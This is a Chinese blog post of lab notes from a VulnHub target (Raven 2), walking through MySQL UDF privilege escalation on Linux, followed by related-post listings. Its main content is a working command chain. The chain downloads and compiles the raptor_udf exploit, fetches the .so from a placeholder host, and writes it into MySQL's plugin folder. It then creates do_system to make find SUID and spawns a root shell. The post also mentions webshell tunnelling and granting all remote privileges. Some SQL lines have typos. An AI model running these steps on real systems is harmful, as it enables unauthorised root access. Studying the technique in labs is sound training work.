Linux提权--第三方软件MYSQL数据库提权(WEB+本地)

于 2024-05-12 17:30:39 发布
阅读量849 收藏 5
点赞数 22
分类专栏: # 权限提升 文章标签: 数据库 linux mysql web安全 网络安全 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138760311
版权

免责声明:本文仅做技术交流与学习,非法搞事后果自负...

目录

靶场镜像:

过程:

手工:

下载mysql udf poc 进行编译.

进入数据库进行UDF导出

下载(上传)

创建do_system函数调用

探针(./LinEnum.sh),查找suid权限.

配合使用find调用执行

工具:

过程:

 外连不上?

隧道出网(域控) 

数据库开外连命令:

靶场镜像:

Raven: 2 ~ VulnHub

过程:

Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用

Mysql提权Linux(Mysql版本区别同Windows)

手工:

下载mysql udf poc 进行编译.

wget https://www.exploit-db.com/download/1518

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

---下载1518.so---->上传到webshell上去.

上传或下载1518到目标服务器

wget https://xx.xx.xx.xx/1518.so

进入数据库进行UDF导出

(连接到数据库执行命令)

下载(上传)
use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile'/usr/lib/mysql/plugin/1518.so";
创建do_system函数调用
create function do_systemreturns integer soname'1518.so'

select do_system(chmod u+s /usr/bin/find');	
#给哪个命令一个执行权限

探针(./LinEnum.sh),查找suid权限.

--配合百科等等

find/-user root-perm -4000 -print 2>/dev/null

配合使用find调用执行

touch xiaodi

find xiaodi -exec "whoami"\;

find xiaodi -exec "/bin/sh"\;

id

工具:

Multiple.Database.Utilization.Tools-2.1.1

过程:

后门进去-->探针    Linenum.sh-->有mysql    --->找数据库的配置文件 -->用 **MDUTMDUT**连接,(这个连接有问题)--(开了外连还是连接不上)

---发现连接不上,-->用**哥斯拉**的后门连接mysql,执行命令,开启外链.

(用navicat连接试一下)

 外连不上?

连接不上,因为此靶场-->

防火墙过滤 .

开了外连 还是连接不上 查看user数据 已经设置外联.

外部到里面不行 --

1、手工提权(在webshell上面的数据库管理进行提权)自己连接自己

2.隧道出网(用外部或本机的工具项目提权建立隧道)

隧道出网(域控) 

里面出来外部

让webshell服务器3306转到本地的3300连接

--冰蝎内网穿透--http隧道 ----- MDUTMDUT连上直接提权.(数据库5种都能提)(不用考虑操作系统)

 --内网渗透后面详解...

数据库开外连命令:

GRANT ALL PRIVILEGES ON . TO '账号' IDENTIFIED BY '密码' WITH GRANT OPTION;

flush privileges;

金灰
关注
  • 22
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
应急响应----第三方服务
qi_SJQ_的博客
02-19 1910
一、必备知识点 1、第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知与口令相关的攻击也要进行筛选。 2、排除第三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本 3、由于工具和脚本更新迭代快、分类复杂,那么打造自己的工具箱迫在眉睫 二、案例分析 1.Win 日志自动神器 LogonTracer-外网内网 需要部署在linux云服务器,在win本地上传日志文件实现自动化分析。 项目地址:https://github.com/JPCERTCC/
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1778
第三方软件提权、Bypass UAC提权
一个基于 go-cqhttp 开发,以 MySQL 作为数据库的 qq 群功能型机器人.zip
最新发布
04-22
MySQL 是一款广受欢迎的开源关系型数据库管理系统(RDBMS),由瑞典MySQL AB公司开发,现隶属于美国甲骨文公司(Oracle)。自1998年首次发布以来,MySQL以其卓越的性能、可靠性和可扩展性,成为全球范围内Web应用程序、企业级解决方案以及其他各种数据处理场景的首选数据库平台之一。 以下是对MySQL数据库的详细介绍: 核心特性与优势 开源与跨平台 MySQL遵循GPL开源协议,这意味着任何人都可以免费下载、使用和修改其源代码。这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系型数据库模型,数据以表格形式组织,并通过预定义的键(如主键、外键)在表之间建立关联。它完全支持结构化查询语言(SQL),允许用户进行数据查询、插入、更新、删除、创建和管理数据库结构等操作。SQL标准的广泛支持使得MySQL易于学习,且与其他关系型数据库系统有良好的互操作性。 存储引擎 MySQL支持多种存储引擎,如InnoDB、MyISAM、MEMORY等,每种引擎都有特定的优势和适用场景。例如,InnoDB提供事务安全、行级锁定和外键约束,适合处理高并发事务性的应用;MyISAM则更侧重于读取密集型操作,提供全文索引支持,适用于读多写少的场景。这种多引擎架构使得MySQL能够适应不同业务需求,提供高度定制化的存储解决方案。 性能与可扩展性 MySQL通过高效的缓存机制、查询优化器以及对硬件资源的有效利用,保证了在高负载情况下的稳定性和快速响应。它支持水平扩展(如通过分片、复制等技术)和垂直扩展(如增加硬件资源),以应对大规模数据存储和高并发访问的需求。 安全性与管理工具 MySQL提供了一系列安全措施,如用户账户管理、访问权限控制、SSL/TLS加密连接、审计日志等功能,确保数据的安全性和合规性。同时,MySQL附带了一系列管理工具,如MySQL Server、MySQL Workbench、MySQL Shell等,便于用户进行数据库配置、监控、备份、恢复、迁移等工作。 社区与生态系统
张小白的渗透之路(十一)--windows提权详解
Litbai_zhang
03-04 5172
windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** quser or query user **#获取在线用户** netst...
Windows提权第三方组件mysql提权(mof)
mrx56的博客
03-31 3742
为什么要提权? 答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令 内置组: Administrators(管理员组) Guests (来宾组,权限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
Linux提权mysql UDF提权
waxcj的博客
12-16 2007
linux mysql数据库提权
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1080
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
Windows提权第三方应用
qq_61553520的博客
01-28 385
电脑(服务器)装的第三方应用越多,安全隐患越大。
mysql提权方式linux_Linux提权的几种常用方式
weixin_32124135的博客
02-28 436
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
第三方提权
一个普普通通的博客
04-17 1987
第三方提权 可以进入注册表查看装了哪些软件 搜狗输入法提权 原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制) 通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch) FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法 LPK劫持(dll劫持) 一种是需要程序本身的dll,根据函数仿制一个dll 另一种是直接生成一个恶意dl
竞拍网后台,基于springboot、mybatis-plus、jpa、mysql数据库已提供.zip
04-22
这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系...
基于 Vue+Vue-router+elementui +axios +nodejs+ mysql 的超市管理系统.zip
04-19
MySQL拥有庞大的开发者社区和丰富的第三方插件、库、中间件支持,提供了丰富的文档、教程、论坛以及专业服务,极大地简化了开发、运维和故障排查过程。 关键组件与日志 系统数据库 MySQL内部包含几个特殊的系统...
mysql mysql与其它数据库的对比
09-24
7. 数据库管理:Oracle提供了更多的数据库管理工具,例如Oracle Enterprise Manager,而MySQL则需要使用第三方工具或自己编写脚本来管理数据库。 与 SQL Server 对比: 1. 功能:SQL Server和MySQL都是关系型...
这是一个简单的学生管理系统网站,基于前端+flask框架+mysql数据库.zip
04-22
这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系...
提权Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2839
Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下进行(因此比较难实现) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include<unistd.h> void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
Linux提权方法总结
Ays.Ie的博客
11-06 3265
Linux提权方式总结
第64天-权限提升-Linux 定时任务&环境变量&数据库
MCTSOG的博客
05-07 1010
思维导图 演示案例: Linux 提权本地环境变量安全-Aliyun 案例 1:Linux 提权本地环境变量安全-Aliyun 条件 配合 SUID 进行环境变量提权 本地用户权限 过程:手写调用文件-----编译------复制文件------增加环境变量------执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id demo.c #include<unistd.h> void ma
linux提权——Mysql UDF提权
qq_55202378的博客
04-12 484
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
linux运维mysql面试题
05-11
1. 什么是MySQL? MySQL是一个开源的关系型数据库管理系统(RDBMS),它支持多用户、多线程、多表等功能,广泛应用于Web应用程序的数据管理。 2. MySQL的常见存储引擎有哪些? MySQL的常见存储引擎包括InnoDB、MyISAM、Memory、CSV、Blackhole、Archive等。 3. 如何优化MySQL性能? 优化MySQL性能需要从多个方面入手,包括以下几个方面: - 优化查询语句,避免全表扫描和使用过多的子查询,尽量使用索引; - 适当调整MySQL的参数配置,如缓存大小、连接数等; - 使用合适的存储引擎; - 分析慢查询日志,找出慢查询并进行优化; - 定期清理无用的数据和索引。 4. MySQL的主从同步是什么? MySQL的主从同步是指将一个MySQL服务器作为主服务器,将其它MySQL服务器作为从服务器,主服务器上的数据更改会被同步到从服务器上,从而保证数据的一致性和可用性。 5. 如何进行MySQL主从同步配置? MySQL主从同步配置需要以下几个步骤: - 在主服务器上创建一个可同步的用户,并授予该用户同步数据的权限; - 在从服务器上进行配置,包括设置主服务器的IP地址、同步用户的用户名和密码等; - 启动主服务器上的binlog功能,将数据修改操作写入二进制文件中; - 在从服务器上启动slave进程,开始同步数据。 6. 如何备份和恢复MySQL数据库? 备份MySQL数据库可以使用以下几种方式: - 使用mysqldump命令备份,将数据导出为文本格式; - 使用MySQL自带的数据备份工具,如mysqlbackup、mysqlhotcopy等; - 使用第三方备份工具,如xtrabackup等。 恢复MySQL数据库可以使用以下几种方式: - 使用mysql命令行工具,将备份文件导入到MySQL服务器中; - 使用第三方恢复工具,如xtrabackup等。 7. 如何创建MySQL用户和授权? 创建MySQL用户可以使用以下命令: ``` CREATE USER 'username'@'localhost' IDENTIFIED BY 'password'; ``` 授权MySQL用户可以使用以下命令: ``` GRANT privileges ON database.table TO 'username'@'localhost'; ``` 其中,privileges为用户的操作权限,如SELECT、INSERT、UPDATE等;database.table为授权的数据库和表名;'username'@'localhost'为被授权的用户和主机名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值